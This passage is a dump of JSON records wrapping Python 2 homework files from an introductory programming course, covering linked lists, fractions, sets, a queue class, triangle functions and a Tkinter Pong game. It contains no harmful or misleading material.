elif self.y2() > self.__bar.y() :\r\n if (self.__x > self.__bar.x() and self.__x <= self.__bar.x2()) or (self.x2() >= self.__bar.x() and self.x2() < self.__bar.x2()) :\r\n self.__vely = -self.__vely\r\n self.__puntos += 1\r\n if self.y2() > self.__alto :\r\n self.__muerto = True\r\n "
},
{
"alpha_fraction": 0.6204569339752197,
"alphanum_fraction": 0.6360332369804382,
"avg_line_length": 24.342105865478516,
"blob_id": "f055904b37bd24e2c4c8a3e61fb4b97f5333efbf",
"content_id": "5cbc858660823a61a0bc091a3261bde2f6535bcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1926,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 76,
"path": "/Ejercicios/Semana 06/ejercicio.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import estructura\n#lista: valor(any) siguiente(lista)\nestructura.crear(\"lista\",\"valor siguiente\")\nlistaVacia=None #lista sin valores\n\n#cabeza: lista -> any\n#primer valor de una lista\n#ej: cabeza(lista(\"a\",lista(\"b\",None)))->\"a\"\ndef cabeza(L):\n assert type(L)==lista\n return L.valor\nassert cabeza(lista(\"a\",lista(\"b\",None)))==\"a\"\n\n#cola: lista -> lista\n#devuelve lista sin primer valor\n#ej: cola(lista(\"a\",lista(\"b\",None)))->lista(\"b\",None)\n#ej: cola(lista(\"a\",None))->None\ndef cola(L):\n assert type(L)==lista\n return L.siguiente\nassert cola(lista(\"a\",lista(\"b\",None))) == lista(\"b\",None)\nassert cola(lista(\"a\",None))==None\n\n#esLista: lista -> bool\n#True si L es una lista\n#ej: esLista(lista(1,None)) -> True\n#ej: esLista(0) -> False\ndef esLista(L) :\n return type(L) == lista or L == None\nassert esLista(lista(1, None))\nassert not esLista(0)\n\n#enLista: any lista -> bool\n#True si x esta en L\n#ej: si L=lista(4,lista(5,None)) entonces\n# enlista(5,L)->True, enLista(3,L)->False\ndef enLista(x,L):\n assert esLista(L)\n if L==None: return False\n if cabeza(L)==x: \n return True\n else: \n return enLista(x,cola(L))\nL=lista(4,lista(5,None))\nassert enLista(5,L)\nassert not enLista(3,L)\n\n#AB: valor(any), izq(AB), der(AB)\nestructura.crear(\"AB\",\"valor izq der\")\n\nA=AB(4, \\\n AB(2,AB(1,None,None),AB(3,None,None)),\\\n AB(6,AB(5,None,None),None))\n\n#esAB: any -> bool\n#True si x es un AB\n#ej: esAB(A)->True\n#ej: esAB(None)->True\ndef esAB(x):\n return x==None or type(x)==AB\nassert esAB(A)\nassert esAB(None)\n\n\n#--------------- Ejercicio ---------------#\n\n# aLista : AB -> lista\n# Convertir A a lista (ordenada por valores).\n# aLista(AB(4,AB(2,AB(1,None,None),AB(3,None,None)), AB(6,AB(5,None,None),None))) -> lista(1, lista(2, lista(3, lista(4, lista(5, lista(6, None))))))\ndef aLista(A) :\n assert esAB(A)\n if A == None : return\n aLista(A.der, l)\n l = lista(A.valor, l)\n aLista(A.izq,l)\n if A == None : return l\n"
},
{
"alpha_fraction": 0.5083073973655701,
"alphanum_fraction": 0.5238837003707886,
"avg_line_length": 21.940475463867188,
"blob_id": "c4890173571a1996c1813b9334dfd6d800b6e3b3",
"content_id": "f869e791d4259cfc9c4b068f17bf936137485cec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1926,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 84,
"path": "/Tareas/Tarea 04/Cola.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# __L : list\n# max : int\nclass Cola:\n #__init__ : int -> Cola\n # Crea un objeto de clase Cola de largo maximo n. Devuelve una referencia al objeto.\n # ej: Cola() -> referencia a objeto\n def __init__(self, n) :\n assert type(n) == int and n > 0\n self.max = n\n self.__L = []\n \n # poner : any -> \n # Agrega un valor al final de la cola.\n # ej: poner(1)\n # ej: poner(2)\n def poner(self, x) :\n assert len(self.__L) <= self.max-1 \n self.__L.append(x)\n \n # sacar : -> any\n # Saca y entrega el primer valor de la cola.\n # ej: sacar() -> 1\n def sacar(self) :\n return self.__L.pop(0)\n\n # vacia : -> bool\n # True si la cola esta vacia.\n # ej: vacia() -> False\n def vacia(self) :\n return len(self.__L) == 0\n \n # llena: -> bool\n # True si la cola esta llena.\n # ej: llena() -> False\n def llena(self) :\n return len(self.__L) == self.max\n\n # len: Cola -> int\n # Entrega el largo de una cola.\n # ej: len(c) -> 1\n def __len__(self) :\n i = 0\n for item in self.__L :\n i += 1\n return i\n\n # str : Cola -> str\n # Entrega un string con los elementos de una cola separados por espacio.\n # ej: str(c) -> \"2\"\n def __str__(self) :\n res = \"\"\n j = 0\n for i in self.__L :\n res += str(i)\n if j < len(self.__L)-1 : \n res += \" \"\n j += 1\n return res\n\n# __c : Cola\nclass TestCola:\n def __init__(self, n):\n self.__c = Cola(n)\n def test(self):\n self.__c.poner(1)\n assert len(self.__c) == 1\n assert str(self.__c) == \"1\"\n assert not self.__c.llena()\n self.__c.poner(2)\n assert len(self.__c) == 2\n assert str(self.__c) == \"1 2\"\n self.__c.poner(3)\n assert len(self.__c) == 3\n assert str(self.__c) == \"1 2 3\"\n assert not self.__c.vacia()\n assert self.__c.llena()\n assert self.__c.sacar() == 1\n assert self.__c.sacar() == 2\n assert self.__c.sacar() == 3\n assert self.__c.vacia()\n\n# test\nt = TestCola(3)\nt.test()"
},
{
"alpha_fraction": 0.6548237800598145,
"alphanum_fraction": 0.6808203458786011,
"avg_line_length": 32.293270111083984,
"blob_id": "f2f578e369c6c20786d7a31680bd0172e75a7288",
"content_id": "608c821f2a6df7107c70e62a75a3e43ef5ff2393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6924,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 208,
"path": "/Ejercicios/Semana 05/ejercicio.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import estructura\n\n#fraccion: numerador(int) denominador(int)\nestructura.crear(\"fraccion\",\"numerador denominador\")\n\n#esFraccion: fraccion -> bool\n#True si x es una fraccion valida\n#ej: esFraccion(fraccion(1,2))->True\n#ej: esFraccion(fraccion(1,0))->False\ndef esFraccion(x):\n return type(x)==fraccion \\\n and type(x.numerador)==int \\\n and type(x.denominador)==int \\\n and x.denominador!=0\nassert esFraccion(fraccion(1,2))\nassert not esFraccion(fraccion(1,0))\n\n# mcd : int, int -> int\n# calcula el mayor comun divisor entre dos enteros positivos\n# mcd(12, 25) -> 1\ndef mcd(a, b) :\n assert type(a) == int and a>=0\n assert type(b) == int and b>=0\n # caso base, llegamos al resultado\n if b == 0 :\n return a\n if a == b :\n return a\n # necesitamos que a sea mayor que b para continuar\n elif a>b :\n r = a%b # resto de la division a por b\n # si el resto es nulo, llegamos al mayor comun divisor\n if r == 0 :\n return b\n # b toma el valor de a y r toma el valor de b para continuar\n else :\n return mcd(b, r)\n\n print mcd(12, 25)\n # si b es mayor que a, se llama la misma funcion pero con los valores invertidos\n else :\n return mcd(b, a)\nassert mcd(134, 28) == 2\nassert mcd(12, 25) == 1\n\n#simplificar: fraccion -> fraccion\n#fraccion con valor de fraccion x simplificada\n#ej: simplificar(fraccion(2,4))->fraccion(1,2)\ndef simplificar(x):\n assert esFraccion(x)\n m=mcd(x.numerador,x.denominador)\n return fraccion(x.numerador/m, x.denominador/m)\nassert simplificar(fraccion(2,4))==fraccion(1,2)\n\n#aString: fraccion -> str\n#convierte fraccion x a string\n#ej: aString(fraccion(1,2))->\"1/2\"\ndef aString(x):\n assert esFraccion(x) \n return str(x.numerador)+\"/\"+str(x.denominador)\nassert aString(fraccion(1,2)) == \"1/2\"\n\ndef mostrar(x,f):\n print x, aString(simplificar(f))\n\n#suma: fraccion fraccion -> fraccion\n#suma de fracciones x e y\n#ej: suma(fraccion(1,2),fraccion(3,4))->fraccion(10,8)\ndef suma(x,y):\n assert esFraccion(x)\n assert esFraccion(y)\n num = x.numerador * y.denominador + \\\n x.denominador * y.numerador\n den = x.denominador * y.denominador\n return fraccion(num,den)\nassert suma(fraccion(1,2),fraccion(3,4))==fraccion(10,8)\n\n#comparar: fraccion fraccion -> int\n#0 si x==y, n>0 si x>y, n<0 si x<y\n#ej: comparar(fraccion(1,2),fraccion(2,4))->0\n#ej: comparar(fraccion(1,2),fraccion(1,3))->n>0\n#ej: comparar(fraccion(1,3),fraccion(1,2))->n<0\ndef comparar(x,y):\n assert esFraccion(x) and esFraccion(y)\n return x.numerador * y.denominador - \\\n x.denominador * y.numerador\nassert comparar(fraccion(1,2),fraccion(2,4))==0\nassert comparar(fraccion(1,2),fraccion(1,3))>0\nassert comparar(fraccion(1,3),fraccion(1,2))<0\n\n#lista: valor(any) siguiente(lista)\nestructura.crear(\"lista\",\"valor siguiente\")\nlistaVacia=None #lista sin valores\n\n#cabeza: lista -> any\n#primer valor de una lista\n#ej: cabeza(lista(\"a\",lista(\"b\",None)))->\"a\"\ndef cabeza(L):\n assert type(L)==lista\n return L.valor\nassert cabeza(lista(\"a\",lista(\"b\",None)))==\"a\"\n\n#cola: lista -> lista\n#devuelve lista sin primer valor\n#ej: cola(lista(\"a\",lista(\"b\",None)))->lista(\"b\",None)\n#ej: cola(lista(\"a\",None))->None\ndef cola(L):\n assert type(L)==lista\n return L.siguiente\nassert cola(lista(\"a\",lista(\"b\",None))) == lista(\"b\",None)\nassert cola(lista(\"a\",None))==None\n\n#esLista: lista -> bool\n#True si L es una lista\n#ej: esLista(lista(1,None)) -> True\n#ej: esLista(0) -> False\ndef esLista(L) :\n return type(L) == lista or L == None\nassert esLista(lista(1, None))\nassert not esLista(0)\n\n#enLista: any lista -> bool\n#True si x esta en L\n#ej: si L=lista(4,lista(5,None)) entonces\n# enlista(5,L)->True, enLista(3,L)->False\ndef enLista(x,L):\n assert esLista(L)\n if L==None: return False\n if cabeza(L)==x: \n return True\n else: \n return enLista(x,cola(L))\nL=lista(4,lista(5,None))\nassert enLista(5,L)\nassert not enLista(3,L)\n\n#filtro: lista (any any->bool) any -> lista\n#lista con valores de L que cumplen funcion con x\n#ej:filtro(lista(5,lista(4,None)),menorQue,5)->lista(4,None)\ndef filtro(L,funcion,x):\n assert esLista(L)\n if L==None: return None\n if funcion(cabeza(L),x):\n return lista(cabeza(L),filtro(cola(L),funcion,x))\n else:\n return filtro(cola(L),funcion,x)\n\n#test\ndef menorQue(x,y): return x<y\nassert filtro(lista(5,lista(4,None)),menorQue,5)==lista(4,None)\n\n#mapa: lista (any->any) -> lista\n#lista aplicando funcion a valores de L\ndef mapa(L, funcion):\n assert esLista(L)\n if L==None: \n return None\n else:\n return lista(funcion(cabeza(L)),\\\n mapa(cola(L),funcion))\nfrom math import *\nassert mapa(lista(9,lista(25,None)),sqrt)== \\\n lista(3.0,lista(5.0,None))\nassert mapa(lista('ana',lista('juan',None)),len) == \\\n lista(3,lista(4,None))\n\n#reductor: lista (any any->any) any -> any\n#funcion con todos los valores de L\n#acumulando en resultado\ndef reductor(L,funcion,resultado):\n assert type(L)==lista\n r=funcion(resultado,cabeza(L))\n if cola(L)==None:\n return r\n else:\n return reductor(cola(L),funcion,r)\n\n#--------------- Ejercicio ---------------#\ndef menorQueFrac(f1, f2) :\n # precondiciones se chequean en funcion comparar\n if comparar(f1, f2) < 0 : return True\n else : return False\n\n# selectFracsMenores : lista, fraccion -> lista\n# Recibe una lista de fracciones y una fraccion minima, entrega una lista de fracciones que sean inferiores a esta fraccion minima por comparacion.\n# selectFracsMenores(lista(fraccion(1,3), None), fraccion(1,2)) -> lista(fraccion(1,3), None)\n# selectFracsMenores(lista(fraccion(1,2), None), fraccion(1,3)) -> None\ndef selectFracsMenores(L, min) :\n assert esFraccion(min) # precondiciones para L se chequean en funcion filtro\n return filtro(L, menorQueFrac, min)\nassert selectFracsMenores(lista(fraccion(1,3), None), fraccion(1,2)) == lista(fraccion(1,3), None)\nassert selectFracsMenores(lista(fraccion(1,2), None), fraccion(1,3)) == None\n\n# simplificarLista : lista -> lista\n# Recibe una lista de fracciones y entrega una lista de aquellas fracciones simplificadas.\n# simplificarLista(fraccion(2,4), lista(fraccion(3,6), None)) -> lista(fraccion(1,2), lista(fraccion(1,2), None))\ndef simplificarLista(L) :\n # precondiciones se chequean en funcion simplificar y mapa\n return mapa(L, simplificar)\nassert simplificarLista(lista(fraccion(2,4), lista(fraccion(3,6), None))) == lista(fraccion(1,2), lista(fraccion(1,2), None))\n\n# sumarListaFrac : lista -> fraccion\n# Recibe una lista de fracciones y entrega una fraccion simplificada con la suma de todas las fracciones de aquella lista.\n# sumarListaFrac(lista(fraccion(1,2), lista(fraccion(2,2), None))) -> fraccion(3,2)\ndef sumarListaFrac(L) :\n # precondiciones se chequean en funcion suma y reductor\n return simplificar(reductor(L, suma, fraccion(0,1)))\nassert sumarListaFrac(lista(fraccion(1,2), lista(fraccion(2,2), None))) == fraccion(3,2)"
},
{
"alpha_fraction": 0.5367693305015564,
"alphanum_fraction": 0.5763670802116394,
"avg_line_length": 31.851064682006836,
"blob_id": "e8cc2263988f0667536c85372f62fb904d6076b7",
"content_id": "814da4f7491ea0b0c812f80a97a989ea7d7d2c42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 47,
"path": "/Ejercicios/Semana 02/triangulo.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# perimetro: num, num, num -> num\r\n# calcular perimetro de un triangulo.\r\n# ej: perimetro(3, 4, 5) -> 12\r\ndef perimetro(a, b, c) :\r\n assert a > 0 and b > 0 and c > 0 # asegurarse que los valores insertados sean positivos y no nulos.\r\n return a+b+c\r\nassert perimetro(3, 4, 5) == 12\r\n\r\n# area: num, num, num -> float\r\n# calcular el area de un triangulo.\r\n# ej: area(3, 4, 5) -> 6.0\r\ndef area(a, b, c) :\r\n assert a > 0 and b > 0 and c > 0 # asegurarse que los valores insertados sean positivos y no nulos.\r\n s = perimetro(a, b, c)/2.0\r\n return (s*(s-a)*(s-b)*(s-c))**0.5\r\nassert area(3, 4, 5) == 6.0\r\n\r\n# esTriangulo: num, num, num -> bool\r\n# verificar que los valores insertados forman un triangulo valido segun el teorema de la desigualdad triangular.\r\n# ej: esTriangulo(3, 4, 5) -> True\r\n# ej: esTriangulo(1, 2, 3) -> False\r\ndef esTriangulo(a, b, c) :\r\n if a > 0 and b > 0 and c > 0:\r\n if a+b>c and b+c>a and a+c>c:\r\n return True\r\n else :\r\n return False\r\n else :\r\n return False\r\nassert esTriangulo(3, 4, 5)\r\nassert not esTriangulo(1, 2, 3)\r\n\r\n# tipo: num, num, num -> str\r\n# ver si un triangulo es equilatero, escaleno o isosceles.\r\n# ej: tipo(3, 3, 3) -> \"equilatero\"\r\n# ej: tipo(3, 5, 4) -> \"escaleno\"\r\n# ej: tipo(3, 3, 4) -> \"isosceles\"\r\ndef tipo(a, b, c) :\r\n if a == b and a == c :\r\n return \"equilatero\"\r\n elif a != b and a != c :\r\n return \"escaleno\"\r\n else :\r\n return \"isosceles\"\r\nassert tipo(3, 3, 3) == \"equilatero\"\r\nassert tipo(3, 5, 4) == \"escaleno\"\r\nassert tipo(3, 3, 4) == \"isosceles\"\r\n"
},
{
"alpha_fraction": 0.618547260761261,
"alphanum_fraction": 0.6427592635154724,
"avg_line_length": 25.04938316345215,
"blob_id": "619f37248672db2ef2f88fe8c2f95af5ce3393a1",
"content_id": "918de483ad535f764a7252395de9a6a230abd7fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2189,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 81,
"path": "/Pong/pong.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from Tkinter import *\r\nfrom elementos import *\r\nfrom random import randint\r\n\r\nANCHO = 400\r\nALTO = 400\r\nDT = 1000/30\r\n\r\ncorriendo = False\r\n\r\ndef actualizarPuntos(puntos) :\r\n if bola.muerto() :\r\n labelPuntos.config(text='Game Over, Score = ' + str(puntos))\r\n else :\r\n labelPuntos.config(text='Score = ' + str(puntos))\r\n\r\ndef actualizarBoton() :\r\n if bola.muerto() :\r\n boton.config(text='Reset', command=reset)\r\n else :\r\n boton.config(text='Run', command=run)\r\n\r\ndef actualizarCanvas() :\r\n global corriendo\r\n if bola.muerto() : \r\n corriendo = False\r\n actualizarPuntos(bola.puntos())\r\n actualizarBoton()\r\n return\r\n cv.after(DT, actualizarCanvas)\r\n bola.actualizarPos()\r\n cv.move(elemBola, bola.velx(), bola.vely())\r\n actualizarPuntos(bola.puntos())\r\n \r\ndef run() :\r\n global corriendo\r\n if corriendo : return\r\n corriendo = True\r\n actualizarCanvas()\r\n\r\ndef reset() :\r\n global corriendo, bola, elemBola\r\n corriendo = True\r\n del bola\r\n cv.delete(elemBola)\r\n bola = Bola(randint(20, 380), 20, cv, barra)\r\n elemBola = cv.create_oval(bola.x(), bola.y(), bola.x2(), bola.y2(), fill='red')\r\n actualizarCanvas()\r\n actualizarPuntos(bola.puntos())\r\n actualizarBoton()\r\n\r\ndef key(event) :\r\n if bola.muerto() : return\r\n if event.keysym == 'Left' :\r\n if barra.x() > 1 :\r\n barra.actualizarPos(-1) \r\n cv.move(elemBarra, -20, 0)\r\n if event.keysym == 'Right' : \r\n if barra.x() + barra.ancho() < ANCHO - 1 :\r\n barra.actualizarPos(1) \r\n cv.move(elemBarra, 20, 0)\r\n\r\nventana = Tk()\r\nframeSuperior = Frame(ventana)\r\nframeSuperior.pack()\r\nlabelPuntos = Label(frameSuperior, text='Score = 0', font=('', 20))\r\nlabelPuntos.pack(side=LEFT)\r\nboton = Button(frameSuperior, text='Run', height=2, width=10, command=run)\r\nboton.pack()\r\ncv = Canvas(ventana, width=ANCHO, height=ALTO)\r\ncv.pack()\r\ncv.update()\r\n\r\nbarra = Barra(ANCHO / 2, ALTO - 15, 60, 10)\r\nelemBarra = cv.create_rectangle(barra.x(), barra.y(), barra.anchoBarra(), barra.altoBarra(), fill='black')\r\nbola = Bola(randint(20, 380), 20, cv, barra)\r\nelemBola = cv.create_oval(bola.x(), bola.y(), bola.x2(), bola.y2(), fill='red')\r\n\r\ncv.bind('<Key>', key)\r\ncv.focus_set()\r\nventana.mainloop()"
},
{
"alpha_fraction": 0.5014688372612,
"alphanum_fraction": 0.565511167049408,
"avg_line_length": 28.60869598388672,
"blob_id": "96c1ccfcfa6131c0798c6f4309bed1b5a9ed371d",
"content_id": "da3008e6f2518c2ba499cc6789f08be6b46c85ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3404,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 115,
"path": "/Tareas/Tarea 03/conjunto.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# esConjunto : list -> bool\n# True si el list entregado forma un conjunto (no se aceptan elementos repetidos).\n# ej: esConjunto([1,2,3]) -> True\n# ej: esConjunto([1,2,1]) -> False\ndef esConjunto(x) :\n assert type(x) == list\n for i in x :\n if x.count(i) > 1 : return False\n return True\nassert esConjunto([1,2,3])\nassert not esConjunto([1,2,1])\n\n# pertenece : any, list -> bool\n# True si el primer argumento pertenece al conjunto (segundo argumento).\n# ej: pertenece(1, [1, 2, 3]) -> True\n# ej: pertenece(4, [1, 2, 3]) -> False\ndef pertenece(a, x) :\n assert esConjunto(x)\n return a in x\nassert pertenece(1, [1, 2, 3])\nassert not pertenece(4, [1, 2, 3])\n\n# cardinal : list -> int\n# Entrega el cardinal (numero de elementos) de un conjunto dado.\n# ej: cardinal([1, 2]) -> 2\n# ej: cardinal([1, 2, 3]) -> 3\ndef cardinal(x) :\n assert esConjunto(x)\n return len(x)\nassert cardinal([1, 2]) == 2\nassert cardinal([1, 2, 3]) == 3\n\n# sub : list, list -> bool\n# True si el primer conjunto dado es subconjunto del segundo conjunto.\n# ej: sub([1, 2], [1, 2, 3]) -> True\n# ej: sub([1, 2, 3], [1, 2]) -> False\ndef sub(x, y) :\n assert esConjunto(x) and esConjunto(y)\n for i in x :\n if not i in y : return False\n return True\nassert sub([1, 2], [1, 2, 3])\nassert not sub([1, 2, 3], [1, 2])\n\n# igual : list, list -> bool\n# True si los dos conjuntos dados son iguales.\n# ej: igual([1, 2], [1, 2]) -> True\n# ej: igual([1, 2], [1, 2, 3]) -> False\ndef igual(x, y) :\n assert esConjunto(x) and esConjunto(y)\n return sub(x, y) and sub(y, x)\nassert igual([1, 2], [1, 2])\nassert not igual([1, 2], [1, 2, 3])\n\n# aString : list -> str\n# Transforma un conjunto (list) a un string con los elementos separados por un espacio.\n# ej: aString([1, 2]) -> \"1 2\"\n# ej: aString([1]) -> \"1\"\ndef aString(x) :\n assert esConjunto(x)\n res = \"\"\n j = 0\n for i in x :\n res += str(i)\n if j < len(x)-1 : \n res += \" \"\n j += 1\n return res\nassert aString([1]) == \"1\"\nassert aString([1, 2, 3]) == \"1 2 3\"\n\n# union : list, list -> list\n# Recibe dos conjuntos y entrega la union entre ellos.\n# ej: union([1, 2, 3], [4, 5, 6]) -> [1, 2, 3, 4, 5, 6]\n# ej: union([1, 2, 3], [2, 3, 4]) -> [1, 2, 3, 4]\ndef union(x, y) :\n assert esConjunto(x) and esConjunto(y)\n for i in y :\n if not pertenece(i, x) :\n x.append(i)\n return x\nassert union([1, 2, 3], [4, 5, 6]) == [1, 2, 3, 4, 5, 6]\nassert union([1, 2, 3], [2, 3, 4]) == [1, 2, 3, 4]\n\n# inter : list, list -> list\n# Recibe dos conjuntos y entrega la interseccion entre ellos.\n# ej: inter([1, 2, 3], [2, 3, 4]) -> [2, 3]\n# ej: inter([1, 2, 3], [1, 2, 3]) -> [1, 2, 3]\n# ej: inter([1, 2, 3], [4, 5, 6]) -> None\ndef inter(x, y) :\n assert esConjunto(x) and esConjunto(y)\n res = []\n for i in x :\n if pertenece(i, y) : res.append(i)\n if res == [] : return None\n return res\nassert inter([1, 2, 3], [2, 3, 4]) == [2, 3]\nassert inter([1, 2, 3], [1, 2, 3]) == [1, 2, 3]\nassert inter([1, 2, 3], [4, 5, 6]) == None\n\n# resta : list, list -> list\n# Recibe dos conjuntos y entrega la resta entre ellos.\n# ej: resta([1, 2], [2, 3]) -> [1]\n# ej: resta([1, 2], [3, 4]) -> [1, 2]\n# ej: resta([1, 2], [1, 2]) -> None\ndef resta(x, y) :\n assert esConjunto(x) and esConjunto(y)\n for i in y :\n if pertenece(i, x) :\n x.remove(i)\n if x == [] : return None\n return x\nassert resta([1, 2], [2, 3]) == [1]\nassert resta([1, 2], [3, 4]) == [1, 2]\nassert resta([1, 2], [1, 2]) == None"
},
{
"alpha_fraction": 0.684544563293457,
"alphanum_fraction": 0.6877182126045227,
"avg_line_length": 36.08235168457031,
"blob_id": "28a143fd489146ffae003b7065f0aa90a4c9623b",
"content_id": "c01f9e1c29fd4bc3b82d617fd6984863937e398b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3151,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 85,
"path": "/Tareas/Tarea 02/prueba.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from conjunto import *\n\n# lectura: None -> lista\n# Realiza la lectura de los elementos de un conjunto, cuando se inserta el 0, se termina la lectura y se entrega el conjunto generado.\n# lectura() -> lista(1, lista(2, None))\ndef lectura() :\n def obtenerElementos(con=None) :\n assert esConjunto(con)\n nuevoElemento = input(\"elemento? \")\n if nuevoElemento == 0 : return con\n return obtenerElementos(lista(nuevoElemento, con))\n return obtenerElementos()\n\n# operacion: lista, lista -> lista\n# Lee y realiza las operaciones entre dos conjuntos A y B (hasta ingresar la operacion punto) y entrega el conjunto resultado de la operacion.\n# operacion(lista(1, None), lista(2, None), suma) -> lista(1, lista(2, None))\ndef operacion(conjuntoA, conjuntoB) :\n assert esConjunto(conjuntoA)\n assert esConjunto(conjuntoB)\n op = raw_input(\"Operacion(+*-=<>.)? \")\n if op == \"+\" :\n resultado = union(conjuntoA, conjuntoB)\n print \"A union B=\", aString(resultado), \"Cardinal=\", cardinal(resultado)\n return operacion(conjuntoA, conjuntoB)\n elif op == \"*\" :\n resultado = inter(conjuntoA, conjuntoB)\n print \"A interseccion B=\", aString(resultado), \"Cardinal=\", cardinal(resultado)\n return operacion(conjuntoA, conjuntoB)\n elif op == \"-\" :\n resultado = resta(conjuntoA, conjuntoB)\n print \"A - B=\", aString(resultado), \"Cardinal=\", cardinal(resultado)\n return operacion(conjuntoA, conjuntoB)\n elif op == \"=\" :\n if igual(conjuntoA, conjuntoB) : resultado = \"Si\"\n else : resultado = \"No\"\n print \"A = B es \", resultado\n return operacion(conjuntoA, conjuntoB)\n elif op == \"<\" :\n if sub(conjuntoA, conjuntoB) : resultado = \"Si\"\n else : resultado = \"No\"\n print \"A subconjunto de B es \", resultado\n return operacion(conjuntoA, conjuntoB)\n elif op == \">\" :\n if sub(conjuntoB, conjuntoA) : resultado = \"Si\"\n else : resultado = \"No\"\n print \"A superconjunto de B es \", resultado\n return operacion(conjuntoA, conjuntoB)\n elif op == \".\" :\n return\n else :\n print \"Operacion invalida.\"\n return operacion(conjuntoA, conjuntoB)\n\n# escaparDialogo: None -> None\n# Sirve para escapar el dialogo prueba(), al entregar \"si\" se reinicia el dialogo, si se entrega \"no\" se escapa del dialogo, cualquier otra cosa vuelve a preguntar.\n# escaparDialogo()\ndef escaparDialogo() :\n opcion = raw_input(\"Otros conjuntos(si/no)? \")\n if opcion == \"si\" : return prueba()\n elif opcion == \"no\" : return\n else :\n print \"Opcion invalida.\"\n return escaparDialogo()\n\n# prueba: None -> None\n# Realiza un dialogo recursivo para realizar operaciones entre conjuntos.\n# prueba()\ndef prueba() :\n # Se realiza la lectura de ambos conjuntos.\n print \"Ingrese elementos Conjunto A (o 0 para terminar).\"\n conjuntoA = lectura()\n print \"A=\", aString(conjuntoA), \"Cardinal=\", cardinal(conjuntoA)\n print \"Ingrese elementos Conjunto B (o 0 para terminar).\"\n conjuntoB = lectura()\n print \"B=\", aString(conjuntoB), \"Cardinal=\", cardinal(conjuntoB)\n \n # Se realizan las operaciones.\n operacion(conjuntoA, conjuntoB)\n\n # Se pide al usuario si quiere repetir el dialogo o no.\n escaparDialogo()\n return\n\n# test #\nprueba()"
},
{
"alpha_fraction": 0.7308707237243652,
"alphanum_fraction": 0.7308707237243652,
"avg_line_length": 21.6875,
"blob_id": "92ba21cdf51b1c7dc3e67859d55a31f749ed98bf",
"content_id": "b768f2b6846bb304f5234b04d6b4dfb0e1c2c7f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 16,
"path": "/Ejercicios/Semana 03/main.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import fractalCuadrado\r\nimport turtle\r\n\r\n# inicializacion de turtle\r\nturtle.getscreen()\r\nturtle.resetscreen()\r\n\r\n# pedir valores de orden y de largo al usuario\r\nn = input(\"nivel: \")\r\nL = input(\"largo: \")\r\n\r\n# inicia el trazado\r\nfractalCuadrado.fractal(n)\r\n\r\n# marca el final del trazado y mantiene la ventana del turtle abierta hasta que se cierre por el usuario\r\nturtle.done()\r\n"
},
{
"alpha_fraction": 0.6461366415023804,
"alphanum_fraction": 0.663605809211731,
"avg_line_length": 48.06593322753906,
"blob_id": "c8e09d582b6ef601ab1b3a50a2a754c3dbd63213",
"content_id": "45a8146bb022fc0b81a43f54bcdfbc44e735966a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4465,
"license_type": "no_license",
"max_line_length": 345,
"num_lines": 91,
"path": "/Tareas/Tarea 01/parte2.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import sistemasPosicionales\n\n# aislarBase : int -> int\n# Recibe un entero positivo expresado de la forma BNNNNN... donde B corresponde a la base y los N a los digitos del numero. Devuelve la base (el primer digito).\n# ej: aislarBase(21010) -> 2\ndef aislarBase(numero) :\n assert type(numero) == int and numero >= 0\n if numero < 10 :\n return numero\n else :\n return aislarBase(numero/10)\nassert aislarBase(21010) == 2\n\n# aislarDigitos : int -> int\n# Recibe un entero positivo expresado de la forma BNNNN... donde B corresponde a la base y los N a los digitos del numero. Devuelve los digitos que van despues de la base.\n# ej: aislarDigitos(514123) -> 14123\ndef aislarDigitos(numero) :\n assert type(numero) == int and numero >= 0\n exponente = len(str(numero))-1\n base = aislarBase(numero)\n return numero - base*10**(exponente)\nassert aislarDigitos(514123) == 14123\n\n# binario : None -> None\n# Convierte a binario enteros positivos expresados en bases numericas posicionales del 3 al 10 y muestra finalmente la cantidad de conversiones correctas.\n# ej: binario()\ndef binario() :\n # usamos una funcion interna para contar cuantas iteraciones correctas se realizan\n def binarioContador(contador=0) :\n base = input(\"base? \")\n # queremos romper el ciclo si la base es 0\n if base == 0 :\n print contador # mostramos el contador\n return\n # si la base es no esta en el rango 3 - 10, recomenzamos\n elif base < 3 or base > 10 :\n print \"base incorrecta\"\n return binarioContador(contador)\n n = input(\"n? \")\n # si el numero no esta bien expresado en su base correspondiente, recomenzamos\n if not sistemasPosicionales.correcto(n, base) :\n print \"numero incorrecto\"\n return binarioContador(contador)\n # si el numero es un decimal, entonces podemos convertirlo directo en binario\n if base == 10 :\n bin = sistemasPosicionales.otraBase(n, 2)\n print 